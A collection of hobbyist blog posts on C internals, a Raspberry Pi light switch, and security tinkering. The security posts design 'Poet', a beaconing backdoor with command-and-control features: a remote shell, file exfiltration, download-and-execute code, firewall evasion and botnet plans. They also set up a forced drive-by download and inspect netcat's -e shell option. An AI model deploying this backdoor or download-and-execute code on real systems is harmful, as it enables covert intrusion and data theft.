Note: i’m going to try a significantly more informal blogging style
struct stat on Linux is pretty interesting
the struct definition in the man page is not exactly accurate
glibc explicitly pads the struct with unused members which is intersting. I guess to reserve space for expansion of fields
if you want to see the real definition, a trick you can use is writing a test program that uses a struct stat, and compiling with -E to stop after preprocessing then look in that output for the definition
you can look in the glibc sources and the linux sources and see that they actually have to make their struct definitions match! (i think). since kernel space is populating the struct memory and usespace is using it, they need to exactly agree on where what members are
you can find some snarky comments in linux about the padding, which is pretty funny. for example (arch/arm/include/uapi/asm/stat.h)
because the structs are explicitly padded, if you do a struct designator initialization, you CANNOT omit the designators. if you do, the padded members will be initialized instead of the fields you wanted!
Pretty recently I learned about setjmp() and longjmp(). They’re a
neat pair of libc functions which allow you to save your program’s current
execution context and resume it at an arbitrary point in the future (with
some caveats1).
If you’re wondering why this is particularly useful, to quote
the manpage, one of their main use cases
is “…for dealing with errors and
interrupts encountered in a low-level subroutine of a program.” These functions
can be used for more sophisticated error handling than simple error
code return values.
I was curious
how these functions worked, so I decided to take a look
at musl libc’s
implementation for x86.
First, I’ll explain their interfaces and show an example usage program.
Next, since this post isn’t aimed at the assembly wizard, I’ll cover some
basics of x86 and Linux calling convention to provide some required background
knowledge.
Lastly, I’ll walk through the source, line by line.
Interfaces
1
intsetjmp(jmp_bufenv);
setjmp() takes a single jmp_buf opaque type, returns 0, and continues
execution afterward normally. A jmp_buf is the
structure that setjmp() will save the calling execution context in. We’ll
examine it more closely later on.
1
voidlongjmp(jmp_bufenv,intval);
longjmp() takes a jmp_buf and an int, simply returning back the given
int value (unless it was 0, in which case it returns 1). The unusual aspect
is that when it returns, the program’s execution resumes as if setjmp() had
just been called. This allows the user to jump back an arbitrary amount of
frames on the current call stack (presumably out of some deep routine which had
an error). The return value allows the code following the setjmp() call to
differentiate if setjmp() or longjmp() had just been called, and proceed
accordingly.
Here’s a simple example.
123456789101112131415161718192021
#include <setjmp.h>#include <stdio.h>voidfancy_func(jmp_bufenv);intmain(){jmp_bufenv;intret=setjmp(env);if(ret==0){puts("just returning from setjmp!");fancy_func(env);}else{puts("now returning from longjmp and exiting!");}}voidfancy_func(jmp_bufenv){puts("doing fancy stuff");longjmp(env,1);}
The above code creates a jmp_buf and calls setjmp(), saving the current
execution context. Since setjmp() returns 0, the code follows the
first branch, calling fancy_func() and
forwarding on the jmp_buf. fancy_func() does some fancy stuff, then calls
longjmp(), passing in the jmp_buf and 1. Execution returns to the if
statement on line 9, except this time, ret is 1 instead of 0, because
we’re returning from longjmp(). Now the code
follows the else path which prints and exits. 2
Background Knowledge
I’ve mentioned “execution context” a few times, but let’s make that a little
more concrete. In this case, a program’s execution context can be defined by
the state of the processor’s registers.
On x86, the relevant registers are the general purpose, index, and pointer
registers.
ebx, ecx, edx, esi, and edi don’t have particularly special meaning here and
can be thought of as arbitrary 32 bit storage locations. However eax, ebp, and eip
are a little different.
eax is used for function return values (specified by the
cdecl calling
convention)
ebp, the frame pointer, contains a pointer to the start of the current stack
frame.
eip, the instruction pointer, contains a pointer to the next instruction to
execute.
With this in mind, I initially thought that a jmp_buf would be an array
of 9 ints or something, in order to hold each register.
As it happens, jmp_buf is instead declared as (link):
I had never seen this syntax of using bracket operators at the end of a typedef
but searched and found out that the __jmp_buf declaration
declares a fixed size array of 6 unsigned longs, and the jmp_buf declaration
declares an array of 1 struct __jmp_buf_tag. The reason for the array of 1
is so the pointer semantics of arrays kick in and the struct __jmp_buf_tag
is actually passed by reference in calls to setjmp()/longjmp() (as opposed
to being copied).
Anyway, apparently my guess of 9 ints was incorrect, and it’s actually 6 (longs).
Before we
can dig into the source to understand why this is,
we need to understand what the state of
the program stack is at the point setjmp() is called, and to do that, we need
to understand
which calling convention is being used. Since we assume x86 Linux, this will
be cdecl. The
relevant parts of cdecl for this case are:
arguments passed on the stack
integer values and memory addresses returned in eax (as mentioned above)
eax, ecx, edx are caller saved, the rest are callee saved
setjmp()’s code executes immediately
after setjmp()’s call instruction, so at the point the first
instruction of setjmp() executes, the stack looks something like this.
123456789101112
>highmemory<|...||caller'scallersavedeip||caller'scallersavedebp|<ebp|callerstackvar1|// caller's stack frame|callerstackvar2||callerstackvar...||callerstackvarn||pointertojmp_buf|// argument to setjmp|callersavedeip|<esp+---------------------------+// setjmp's stack frame>lowmemory<
(In this illustration, the stack grows down.)
At the top of the stack is the eip value that the call instruction pushed,
or where to return to after setjmp() finishes. Above that is the first,
and only argument, the pointer to the given jmp_buf. Lastly, above that is
the caller’s stack frame.
esp points to the top
of the stack as usual, and ebp is still pointing to the start of the caller’s
stack
frame. Usually the first thing a function does is push
ebp on the stack, and set ebp to esp to now point to the current stack frame (a.k.a the prologue),
but since setjmp() is such a minimal function, it doesn’t do this.
Furthermore, since ebp is one of the registers that needs to be saved, setjmp()
needs it to be unperturbed.
After setjmp() returns, the stack will look something like this:
It’s nearly identical, except eip has been popped off the stack, and is now
executing the next instruction after the caller’s call setjmp. esp has
also been updated accordingly. This is the state of the program that setjmp()
will need to record, and that longjmp() will restore.
Before reading the source I tried to reason about what I expected would happen.
I presume:
General purpose and index registers (eax, ebx, ecx, edx, esi, edi) which don’t
have any effect on control flow can be trivially saved and restored
ebp can similarly be saved “as is”, since its value when
setjmp() executes is exactly what it needs to be restored to in longjmp()
esp cannot be saved “as is” because when setjmp() executes, there is the
extra eip on the stack that is not there after the function returns. Therefore,
the value for esp that should be saved is esp+4 to match the expected
state of the stack after return
The eip that should be saved is the address of the instruction after the
call setjmp instruction, which can be retrieved from the top of the
stack by dereferencing esp
With all that out of the way, let’s read the source (all annotations by me)
(link).
Since this type of low level register manipulation isn’t available from C
(modulo compiler intrinsics), both of these functions are necessarily written
in assembly.
The first line retrieves the argument off the stack, placing a pointer to
the jmp_buf (remember, an array of 6 unsigned longs) in eax. It then moves
ebx, esi,
edi, and ebp “as is” into the int array. It adds 4 to esp with a lea and
stores that next. Next, it dereferences esp and stores that in the last slot
in the array. Lastly, it zeroes out eax and returns.
The final state of the jmp_buf after setjmp() returns looks like:
The first two lines retrieve the arguments (pointer to jmp_buf, int return
val) from the stack into edx and eax, respectively. The int val is
incremented to 1 if it is 0, according to the spec. Next, ebx, esi, edi, and
ebp are reset
to their saved state, stored in the jmp_buf, in a straightforward manner.
As you can see, both setjmp() and longjmp() need to precisely agree on
where each particular register is saved in the jmp_buf.
esp is mysteriously restored in an indirect manner, via ecx3 and
finally, eip is reset to the saved state via an indirect jump.
So I was mostly correct, but it seems like eax, ecx, and edx were not saved
in the jmp_buf!
If we look back on the details of cdecl, it becomes clear why.
eax doesn’t need to be saved, because it is reserved for the return value
ecx and edx are caller saved. This means that a callee subroutine is
free to trash these registers, and it is the responsibility for the caller
to save and restore them after the subroutine returns. Because of this,
if the function that calls setjmp() needs to use ecx or edx after the
call, it will already have code to save and restore those registers before
and after the function call. Since longjmp() resumes execution as if
setjmp() had immediately returned, execution will automatically hit the
code that restores ecx and edx, making it unnecessary to save them in the
jmp_buf.
This is just one example of how great musl libc is at providing an
understandable resource for learning the internals of systems software. I
often find myself referencing it when I’m curious about libc internals, and
if you’re not familiar with it, I highly recommend checking it out!
Mainly, that the function which called setjmp() cannot have returned before the corresponding longjmp() call.↩
A slight aside: This situation where a function returns different values based on the execution context also appears in fork(), in which the caller uses the return value to differentiate whether it is now executing in the child or parent process. ↩
I actually have no good explanation for this and am pretty curious why it’s done this way. Something like mov $esp, [$edx+16] is a perfectly valid instruction (tested with rasm2)! I asked on the musl mailing list, but no one responded :(. If you have an explanation, please let me know!↩
This is a pretty late post, but I wanted to show off the hardware I designed
as a follow up to the first
“Building a Simple IoT Light Switch”.
In that post I presented a prototype of a smart light switch I designed that
consisted of a button which triggered a small Python server running on a
Raspberry Pi to control my Phillips Hue lights over an HTTP API. It was an
extraordinarily simple design that worked well enough, how it was very
inconvenient to transport since I had to rewire the breadboard to the raspi
GPIO pins every time I moved. Since it seemed production ready
for my needs, I decided to solve this problem by using this as an opportunity
to learn PCB design and actually design a production board.
Special thanks go to Nick Kubasti for teaching me
how to use KiCad and to John Sullivan for helping
me with the final lab work.
The basic circuit I designed is below. It is merely a GPIO pin hooked up to
ground with a switch in between, and an LED and resistor for fun.
The code behind this configures the GPIO pin to use a pull up resistor, which
pulls the pin’s voltage up to VCC when the button is not pressed, and down to
GND when it is. This lets the code poll for when the pin’s value is False.
A more complete schematic including the pull up resistor is below. Note that
I won’t have to implement the pull up part in my design because the Raspberry
Pi implements that internally.
My initial idea was to have a little board that would plug straight down into
the Pi’s GPIO male headers with a little button and LED at the end. However,
that was really wasteful since that would block all of the pins even though
I was only using three of them (input, GND, VCC). Nick suggested a board design
that had two sets of headers: one set of female ones for plugging downwards as I
had originally thought, and one set of male ones facing upward that all the
unused pins would be forwarded to. This way, even though the downward facing
female pins are all plugged in, they can all still be accessed since the board
traces simply connect the unused female pins to the corresponding male ones.
The exception to this is GPIO pin 11, which is the one actually being used for
the switch. I just need to remember for future projects that pin 11 is
reserved. That was probably really hard to understand, so here’s the schematic,
created with KiCad.
On the left you can see the two sets of 13 x 2 headers. The ones on the left
will be the female ones that plug downward into the Pi’s male headers. The
ones on the right will be the male ones that can be used for other projects.
All those wires going around the top and bottom are the forwarded connections.
The one pin exclusively in use on the left is pin 11, which is connected to
the circuit. All the rest are unused, and wires are used to connect them to
their corresponding male header. Pins 1 and 9 are technically in use, but
since they correspond to VCC and GND, it’s fine to forward them too.
The actual circuit is in the bottom left. It’s very similar to the above
circuit diagrams, pin 11 is connected to GND (pin 9) via a switch, and
3.3V VCC (pin 1) is connected to an LED, resistor, and the same GND (pin 9).
The next step after creating the schematic, and assigning actual parts to each
of the components, was to design the printed circuit board (PCB). This involves
laying out the components as they will appear on the physical
silicon wafer.
This was a completely new area to me and it was challenging and fun to
actually draw out the board’s traces, taking care not to intersect them,
and using the different layers when necessary. You might notice that there’s
a seemingly random set of 1 x 2 headers in the middle of the area where the
switch goes. I added those because I noticed that the button and LED were going
to actually extend off the end of the Pi. I was concerned about how pressing
down on the button would actually flip the Pi a little bit, so Nick had an
incredible idea and suggested adding space for a pair of dud headers that
could be used as legs to support the end of the PCB that hung off the side
of the Pi.
After this, I was then able to pretty easily use KiCad to generate some
Gerber files to send to the fab. I chose to use
OshPark based on Nick’s recommendation, and they turned
out to be a great option. I was able to get three copies of my board, with
free shipping for <$8!
After waiting a couple of weeks for the boards to come in, John helped me
solder everything together to finish up this project. During this process
we noticed one design mistake: the layout of the switch was actually way
too big for the switch we had on hand, but that didn’t turn out to be a serious
issue.
Thanks for reading! I have two extra boards I’m not doing anything with, so
if you happen to have a Raspberry Pi and some Hue lights, I’d be happy to give
you the hardware and software for your own DIY light switch.
This post is about an interesting race condition bug I ran into when working
on a small feature improvement for
poet a while ago
that I thought was
worth writing a blog post about.
In particular, I was improving the download-and-execute capability of poet
which, if you couldn’t tell, downloads a file from the internet and executes
it on the target. At the original time of writing, I didn’t know about
the python tempfile module and since I recently learned about it, I wanted
to integrate it into poet as it would be a significant improvement to
the original implementation. The initial patch looked like this.
123456
r=urllib2.urlopen(inp.split()[1])withtempfile.NamedTemporaryFile()asf:f.write(r.read())os.fchmod(f.fileno(),stat.S_IRWXU)f.flush()# ensure that file was actually written to disksp.Popen(f.name,stdout=open(os.devnull,'w'),stderr=sp.STDOUT)
This code downloads a file from the internet, writes it to a tempfile on
disk, sets the permissions to executable, executes it in a subprocess.
In testing this code, I observed some puzzling behavior: the file was
never actually getting executed because it was suddenly ceasing to
exist! I noticed though that when I used
subprocess.call() or used .wait() on the Popen(), it would work
fine, however I intentionally didn’t want the client to block while the
file executed its arbitrary payload, so I couldn’t use those functions.
The fact that the execution would work when the Popen call waited for
the process and didn’t work otherwise suggests that there was something
going on between the time it took to execute the child and the time it took
for the with block to end and delete the file, which is tempfile’s
default behavior. More specifically, the
file must have been deleted at some point before the exec syscall loaded
the file from disk into memory. Let’s take a look at the implementation of
subprocess.Popen() to see if we can gain some more insight:
def_execute_child(self,args,executable,preexec_fn,close_fds,cwd,env,universal_newlines,startupinfo,creationflags,shell,to_close,p2cread,p2cwrite,c2pread,c2pwrite,errread,errwrite):"""Execute program (POSIX version)"""<snip>try:try:<snip>try:self.pid=os.fork()except:ifgc_was_enabled:gc.enable()raiseself._child_created=Trueifself.pid==0:# Childtry:# Close parent's pipe endsifp2cwriteisnotNone:os.close(p2cwrite)ifc2preadisnotNone:os.close(c2pread)iferrreadisnotNone:os.close(errread)os.close(errpipe_read)# When duping fds, if there arises a situation# where one of the fds is either 0, 1 or 2, it# is possible that it is overwritten (#12607).ifc2pwrite==0:c2pwrite=os.dup(c2pwrite)iferrwrite==0orerrwrite==1:errwrite=os.dup(errwrite)# Dup fds for childdef_dup2(a,b):# dup2() removes the CLOEXEC flag but# we must do it ourselves if dup2()# would be a no-op (issue #10806).ifa==b:self._set_cloexec_flag(a,False)elifaisnotNone:os.dup2(a,b)_dup2(p2cread,0)_dup2(c2pwrite,1)_dup2(errwrite,2)# Close pipe fds. Make sure we don't close the# same fd more than once, or standard fds.closed={None}forfdin[p2cread,c2pwrite,errwrite]:iffdnotinclosedandfd>2:os.close(fd)closed.add(fd)ifcwdisnotNone:os.chdir(cwd)ifpreexec_fn:preexec_fn()# Close all other fds, if asked for - after# preexec_fn(), which may open FDs.ifclose_fds:self._close_fds(but=errpipe_write)ifenvisNone:os.execvp(executable,args)else:os.execvpe(executable,args,env)except:exc_type,exc_value,tb=sys.exc_info()# Save the traceback and attach it to the exception objectexc_lines=traceback.format_exception(exc_type,exc_value,tb)exc_value.child_traceback=''.join(exc_lines)os.write(errpipe_write,pickle.dumps(exc_value))# This exitcode won't be reported to applications, so it# really doesn't matter what we return.os._exit(255)# Parentifgc_was_enabled:gc.enable()finally:# be sure the FD is closed no matter whatos.close(errpipe_write)# Wait for exec to fail or succeed; possibly raising exception# Exception limited to 1Mdata=_eintr_retry_call(os.read,errpipe_read,1048576)<snip>
The _execute_child() function is called by the subprocess.Popen class
constructor and implements child process execution. There’s a lot of
code here, but key parts to notice here are the os.fork() call which
creates the child process, and the relative lengths of the following
if blocks. The check if self.pid == 0 contains the code for executing
the child process and is significantly more involved than the code
for handling the parent process.
From this, we can deduce that when the subprocess.Popen() call executes
in my code, after forking, while the child is preparing to call
os.execve, the parent simply returns, and immediately exits the with
block. This automatically invokes the f.close() function which deletes
the temp file. By the time the child calls os.execve, the file has been
deleted on disk. Oops.
I fixed this by adding the delete=False argument to the
NamedTemporaryFile constructor to suppress the auto-delete functionality.
Of course this means that the downloaded files will have to be cleaned up
manually, but this allows the client to not block when executing the file
and have the code still be pretty clean.
Main takeaway here: don’t try to Popen a NamedTemporaryFile as the
last statement in the tempfile’s with block.
Back in April, I won a free “.club” domain through gandi.net’s
anniversary prize giveaway. I really didn’t need
a “.club” domain in particular, so I thought it would be pretty fun to
register a stereotypical “sketchy” domain and set it up as a drive-by
download site or something, because while I’ve heard of doing this kind of
thing, I’ve never actually done it before. Here’s a blog post walking through
what I did. The usual disclaimer applies here: I did this purely for my
own education and learning experience and am not responsible for anything
you do with it.
This involves configuring your web server to automatically set the
Content-Type header of the resource you want to force download
to application/octet-stream. That should make most web browsers trigger
a download file prompt to actually download the file. Safari curiously
doesn’t support prompts for downloaded file location like Chrome and Firefox,
so in that case, it will immediately download the file to ~/Downloads.
I’m going to try to force a drive-by download of a jpg file, so I added
the below config to my .htaccess file in Apache’s DocumentRoot.
That will force browers to download the image, rather than rendering it
when a browser tries to access http://freemoviedownload.club/image.jpg, for
example.
At this point, we’re technically done. We can send someone a link to a file
and, assuming they say yes to the prompt (or use Safari), download it to their
computer. But for some extra polish, I want to have an actual website with
content and have the download come from that page.
Step 3: Redirect
We can accomplish this with a trivial Javascript redirect that executes
after the page has loaded. We can even add a delay before the download happens
to give them time to read the website or whatever. The redirect will need
to be to the path configured in step 2, but this will give the illusion that
the download is coming from the index.html page.
index.html
12345
you have arrived at the official free movie download club! enjoy your download
<script type="text/javascript"charset="utf-8">functionf(){document.location='dickbutt.jpg'}setTimeout(f,2000);</script>
That’s it! Anyone that browses to the website will automatically get a nice
“dickbutt.jpg” image downloaded to their machine. Again, particularly effective
against Safari and Chrome for Android, in my testing.
I’m lucky enough to own a Philips Hue wireless
lighting unit (thanks NUACM!) which essentially is
this really awesome Internet of Things (IoT) product that lets me replace
all my standard light bulbs with special RGB ones that can be controlled
wirelessly. The bulbs communicate via
ZigBee with a “Bridge” unit that
is connected to my local network and hosts an HTTP API for interfacing
with the lights. This API is used by the official Hue mobile app for controlling
the lights, but is also publicly documented and totally hacker friendly.
The lights are awesome, but it is a bit of a drag to have to use an app
to turn them all off rather than having some physical switch 1, so I decided
to fully embrace the IoT trend and use my Raspberry Pi to build a simple
HTTP-fluent light switch for turning my lights on and off.
Hardware
The circuitry itself is literally as simple as it gets for this kind of thing,
all I have is GPIO pin 11 on the board (BCM pin 17) connected to pin 6 (GND),
with a switch in between. In my code, I’ll configure pin 17 to use an internal
pull up resistor which will bring the voltage up to 3.3V when the button is not
pressed and down to 0V when it is.
Software
The Raspberry Pi Python library makes it really easy to control circuits. For
simplicity, my code uses a polling approach to detect when the button is pressed
but the RPi library also supports real callbacks using threading.
12345678
defmain():whileTrue:inp=gpio.input(PIN)# pull up resistor will cause inp to be True when button is not# pressed and False when button is pressedifnotinp:callback()time.sleep(BUTTON_SLEEP)
My callback() function consists of code that uses the Hue API to request
a diagnostic of the lights, which comes back as a JSON blob with each light
represented as an object. If no lights are on, it turns them on, otherwise
turning them all off. Turning the lights on and off is as simple as submitting
a PUT request to the API endpoint for each light with a JSON blob specifying
the state to turn to (On=True, Off=False).
123456789101112131415161718
defcallback():survey=requests.get(BASE+'/lights')survey=json.loads(survey.text)numlights=len(survey)# if any are on, turn all off.ifany([survey[str(x)]['state']['on']forxinrange(1,numlights+1)]):forlightinsurvey.keys():turn(light,False)print'[{}] Off'.format(datetime.datetime.now())else:# else if all are off, then all onforlightinsurvey.keys():turn(light,True)print'[{}] On'.format(datetime.datetime.now())defturn(light,state):data=json.dumps({'on':state})requests.put(BASE+'/lights/{}/state'.format(light),data=data)
That’s it! I leave the script running in a tmux pane on the Pi and I can
hit the button at any point to toggle the lights on and off. The full code
is available on github.
For future work,
it would be cool to integrate RF chips so the button wouldn’t have to be
physically attached to the Pi and I could have a little remote control. I’ll
leave that for another day. Thanks for reading, here it is in action!
Of course I could physically go to each light and flip the switch but manually turning off all three lights in my room is even more work than launching the app.↩
For the past eight months or so, I’ve been working sporadically on a side
project of mine I call Poet. Poet is
basically a tool for hackers that’s useful for post exploitation, that is,
after you’ve initially exploited and gotten access to the computer you’re
not supposed to have access to. Poet is useful because it essentially acts as
a backdoor you can install into a system to help you maintain access once
you’ve gotten your foot in the door.
As a disclaimer, I am building Poet purely for my own education and learning experience.
The code is freely available because I think it might be useful to others interested
in learning about this sort of thing. Use it responsibly.
I’ve learned a lot during the process of
building this tool and I thought it would be cool to write a blog post (possibly
more to come)
documenting that process.
Motivation
The initial motivation for this project came from an experience I had
participating in the 2014 Northeast Collegiate Cyber Defense Competition. In
short, the competition requires a team of students to protect a small
business IT infrastructure from a red team of hackers. Usually the red team
is really good and completely owns you at some point or other throughout
the competition, and at the end they tell you what they did and give
you tips on how to improve. In particular, the red team told us that there
was pre-installed “beaconing” malware on many of our systems from the start
of the competition that would “phone home” to a command and control (C2) server
every once in a while to get commands and tasks to execute on the target
system. This idea was pretty interesting to me, and a basic implementation
didn’t actually seem too hard to write, so I decided to give it a try, even
though at this point, I had no experience with network programming.
v0.1
The first version of Poet was drastically different from the current form
and was just about as simple and primitive as it gets for something
like this. In this version, the client program (executed on target) would
repeatedly attempt to connect to a socket (port 80 by default) on the server (attacker’s C2 server)
at a specified interval. If the connection failed (server
wasn’t running), the client would sleep, otherwise it would execute
a command sent from the server, sending back the stdout of the command.
The
server simply maintained a queue of commands to execute and would one
by one pop them off the queue and send them to the client, printing out the stdout
when it came back.
This was a great exercise
to learn the basics of socket programming, but of course
wasn’t very useful at all, for a number of reasons. First, ideally the client’s
interval is very large so as to minimize network use and
remain stealthy but that puts a hard limit on the rate at which
commands can be executed. This system was also very inflexible because there
was no way to reorder or edit commands in the queue, since the “user
interface” was just a server script that was run with the commands to execute
as arguments. Overall, a good start,
but there was definitely much work ahead to actually make this a semi-realistic tool.
v0.2
The second version of Poet involved a pretty substantial redesign although
one of the things to stay the same would be the high
level client/server beaconing dynamic. This is far superior than having the
client attempt to listen on the target’s end because in any sort of “real”
scenario, the target will likely be behind a firewall that will reject
incoming packets on arbitrary ports.
The beaconing model will allow the tool
to bypass most standard firewalls that aren’t specifically targeting it because
outbound port 80 traffic is almost certainly
allowed. I later changed the default port to 443 because it’s just as
likely to be allowed out and because it could potentially avoid packet inspection,
since traffic on 443 is usually encrypted.
Building on top of this model, there were a couple other brainstorms I had
to build on top of v0.1. Instead of executing a single command for every ping,
what about sending over multiple commands? What about a pastebin/gist URL to
a script that the client
would download and execute? These would help solve the rate limit problem
because an arbitrary number of commands, instead of one, could be executed
for each ping. What about user interface?
What about creating an actual web user interface
for managing the command queue that the client was pulling from each ping?
This would help solve the flexibility problem.
While these would be relatively simple to add to v0.1,
if I asked myself, “If I were a hacker, would I
want to use this tool?” the answer would be “No way!” because I would only be able
to interact with my target system via discrete scripts, and I
would have to wait the ideally large time interval between pings to
get any sort of feedback on my actions.
This made it obvious that I would have to move
from a design where each ping from the client was an opportunity for the
user to run x actions on the target,
to a design where each ping from
the client was an opportunity for the user to interactively control the client
for an unlimited time,
and perform actions on the target with continuous feedback.
With this in mind, I opted to use a shell as the user interface on the server
side since it seemed simpler to implement and I was more familiar with
implementing a shell versus something like a web interface (which would
likely have to have a shell built into it anyway for executing commands).
The server design would be similar to that of v0.1 in that the server would
only be running when the user wanted to control the client, and the client
would use the inability to connect to the server as an sign to “go to sleep”
for another interval, although this isn’t strictly necessary. Another server design
I thought of would be an always-on model where the server would always answer
the client’s ping with some kind of binary state value, which would work equally
well, but wouldn’t be strictly necessary because state can be inferred as
described above.
In designing the actual protocol the client
and server use to communicate, I decided to
use HTTP to mildly obfuscate the client’s initial check if
the server is running. The client’s ping consists of a
GET request for /style.css on the server 1. Of course, the server isn’t
a real web server, but it temporarily masquerades as one for the purposes of
the initial handshake and sends back a hardcoded HTTP response of some random
css file, and launches the control shell for the user. At this point, the
protocol used is as simple as it gets: size of the following data + the data
itself. This being my first time doing socket programming, my implementation
was a little weird and reserved the first five bytes of the data sent over the
wire for the ASCII decimal representation of the size (¯\_(ツ)_/¯), but
hey, it worked.
The majority of the work left for v0.2 was essentially deciding on the features
that the control shell would have and implementing the “userland utilities”
or commands you could run at the shell. The commands I thought of and implemented
were:
exec: This was the first command I wrote. It executes one or more commands on
the target, sending the stdout of all of them back in one big chunk of text. I later
added a flag that would save the big chunk to a file in the archive directory.
Useful for stuff like grabbing process dumps.
recon: Basically like exec, but the commands are pre-selected and are tailored
towards “reconnaissance” purposes. Stuff like whoami, id, uname -a, w, etc.
shell: Launches an actual remote shell on the target (inside the original
control shell). Was implemented
really crudely in this version with the execution backend on the client simply
being something like
exfil: Exfiltrate files and saves to the archive directory. Pretty standard.
Current implementation is pretty crude, and loads entire file into memory, rather
than paging the data somehow.
selfdestruct: Exit the client and delete script on disk. Without this,
the user would have to do something weird (nay, treasonous?) like
killing the client’s process from its own remote shell to completely
turn off the client.
dlexec: Download an executable from the internet and execute it. Also
pretty standard, useful for upgrading or installing additional tools on target
exit: Pretty self explanatory, this tells the client that the server’s
done for now and that the client can now go back to sleep and begin pinging
again in one time interval.
This work resulted in a decently functional prototype that could feasibly
be used for post-exploitation.
v0.3
Version 0.3 was a pretty arbitrary decision, but mostly involved significant
refactoring of the backend code, with a couple new user facing features.
One notable change was the refactoring of the entire codebase from imperative,
C-style programming to object oriented style, which gave the code much better
structure. The communications protocol was also slightly refactored to be
more standard by reserving the first four bytes for
the binary data size value which simultaneously conserved
bytes sent over the wire and increased the maximum data that could be sent in
one message between client and server. An additional shell command I implemented
was called chint, standing for “change interval”, which lets the server
change the client’s ping delay interval after the client’s been started.
All that’s great, but the most significant set of improvements in my opinion
were related to fleshing out the remote shell feature. While it “worked”
to a decent degree for most standard commands there were two main problems with
it that kept it from being a “real” shell. For reference, here’s what the code
looked like for executing commands in v0.2.
For those that aren’t as familiar with Python’s subprocess library, this
executes an arbitrary command line (cmd), sending the stderr to the stdout,
and returns any stdout of the command.
The first problem was that the shell
output was not continuous – when executing a command like ls -R /, which
typically results in lots of scrolling output in a normal terminal, my remote
shell would instead block on the server end while the client executed the
command to its completion and sent over the entire stdout as one big piece.
I solved this problem by adapting the code to continuously poll the
stdout file descriptor for new lines of output, sending those over individually
so that the server would get each line of output as soon as it was available.
The second problem was that if certain commands like ping were executed in the shell,
the client would effectively become unusable because ping (when executed
without the -c parameter) is usually ended by being sent a INT signal (SIGINT),
typically by hitting Ctrl-C on the keyboard. The problem is, the client side
had no mechanism to receive signals and send them to the running process, so
it would be eternally running this unending process and the user
would totally lose control of the target. To solve this problem, I needed a way for the
client to simultaneously execute the requested command, and listen for
messages from the server, presumably telling the client to end the running
process. To do this, I learned to use the select() function which is an
easy way for an application to multiplex data streams (in this case,
the stdout of the running process, and the socket connection to the server)
and process their data without requiring concurrency at the application
level.
The resulting code from these two fixes is below. Select takes in multiple
file descriptors (File objects in Python) and returns which ones
are readable (in this example). After it returns, I can check which file descriptors
it returned, and proceed accordingly. In the expected case where
we can read from the process’s stdout file descriptor, we get a line of
stdout from the process, forwarding it to the server immediately.
In the exceptional case where we can read from the socket, we receive the message,
making sure it contains the proper keyword to end the process (‘shellterm’)
and terminating the process if it does.
123456789101112131415
proc=sp.Popen(inp,stdout=sp.PIPE,stderr=sp.STDOUT,shell=True)whileTrue:readable=select.select([proc.stdout,s.s],[],[],30)[0]forfdinreadable:iffd==proc.stdout:# proc has stdout/err to sendoutput=proc.stdout.readline()ifoutput:s.send(output)else:returneliffd==s.s:# remote signal from serversig=s.recv()ifsig=='shellterm':proc.terminate()return
That’s all for v0.3. Again, the v0.3 decision was pretty arbitrary and I ultimately
chose to ship it because all the other features I had lined up at
the time were
more labor intensive/experimental and I really wanted to get my fancy
new remote shell into master :D.
Future Work
At this point, I’m pretty satisfied with the state of the project, but as
always, there’s more work to be done. Here are some future features/ideas/improvements
that may or may not ever get implemented:
crypto: If anything, I’d say encrypted communications are the one thing
keeping this from being a really usable tool. Right now, communications are
sent in the clear essentially, although they are base64 encoded for the slightest
amount of obfuscation. Ideally I’d use Python’s ssl library, probably doing
something like hardcoding a server public key into the client. A solution
that wouldn’t be as much work, but only slightly more secure than the current
cleartext communications would be to use a basic xor cipher which would be
pretty easy to write, and force an analyst to retrieve the key from memory,
or the initial exchange over the network, depending on how I chose to implement it.
protocol improvement: This shouldn’t actually be too hard to implement,
but the data section of a poet message is typically some type of keyword, a space,
then any relevant data. For example, to start a shell, the server sends
over “shell”, to get recon data, the server sends “recon”, for an exec
command, the server sends over “exec” followed by the commands to execute.
Instead of using these string keywords, it would be possible to move them into
the protocol as a single byte after the data size and have some sort
of lookup table for referencing the appropriate action to each key.
interval fuzzing: Instead of having a strict, predictable delay time
interval for client pings, I could implement some sort of fuzzing so that the delay
time is slightly variable for further obfuscation
purposes.
and last, but not least…
botnet(?!): Now that I more or less have the infrastructure down for
controlling a single client, it would be pretty cool to
fork the project and adapt it for a more distributed design with multiple
clients connecting to the server, all receiving commands to execute.
Again, all the code for this project is available on github.
Hopefully this was interesting/helpful for some people, and as always thanks for reading!
Writing this post and thinking about this again actually helped me discover a bug in the server where the server would terminate if it happened to receive a non-client HTTP request while waiting for the client. This would enable a third party that wanted to mess with the Poet user to spam the Poet user’s machine with HTTP requests (assuming they knew the proper port to send to) at any interval smaller than the Poet interval, and effectively DOS Poet.↩
As I mentioned in a previous post, netcat has this cool
-e parameter that lets you specify an executable to essentially turn into
a network service, that is, a process that can send and receive data over the
network. This option is option is particularly useful when called with a shell
(/bin/sh, /bin/bash, etc) as a parameter because this creates a poor man’s
remote shell connection, and can also be used as a backdoor into the system.
As part of the post-exploitation tool I’m
working on, I wanted to try to add this type of remote shell feature, but it
wasn’t immediately obvious to me
how something like this would be done, so I decided to dive into netcat’s
source and see if I could understand how it was implemented.
Not knowing where to start, I first tried searching the file for “-e” which
brought me to:
case'e':/* prog to exec */if(opt_exec)ncprint(NCPRINT_ERROR|NCPRINT_EXIT,_("Cannot specify `-e' option double"));opt_exec=strdup(optarg);break;
This snippet is using the GNU argument parsing library, getopt, to check if
“-e” is set, and if not, setting the global char* variable opt_exec to the
parameter. Then I tried searching for opt_exec, bringing me to:
if(netcat_mode==NETCAT_LISTEN){if(opt_exec){ncprint(NCPRINT_VERB2,_("Passing control to the specified program"));ncexec(&listen_sock);/* this won't return */}core_readwrite(&listen_sock,&stdio_sock);debug_dv(("Listen: EXIT"));}
This code checks if opt_exec is set, and if so calling ncexec().
